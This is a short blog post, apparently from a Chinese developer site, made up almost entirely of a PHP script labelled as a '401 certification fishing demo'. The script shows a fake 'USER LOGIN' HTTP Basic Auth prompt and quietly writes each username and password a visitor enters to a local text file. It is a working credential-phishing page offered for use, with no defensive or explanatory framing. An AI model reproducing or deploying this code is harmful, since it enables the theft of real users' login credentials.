401 certification fishing demo

<?php
//@b4dboy
if(!isset($_SERVER['PHP_AUTH_USER']) && !isset($_SERVER['PHP_AUTH_PW'])) {
    Header("WWW-Authenticate: Basic realm=\"USER LOGIN\"");
    Header("HTTP/1.0 401 Unauthorized");
} else {
    @file_put_contents('./b4dboy.txt', $_SERVER['PHP_AUTH_USER'].'|'.$_SERVER['PHP_AUTH_PW']."\r\n", FILE_APPEND);
    //xxx
}

    ?>

 

Guess you like

Origin www.cnblogs.com/M0rta1s/p/11517486.html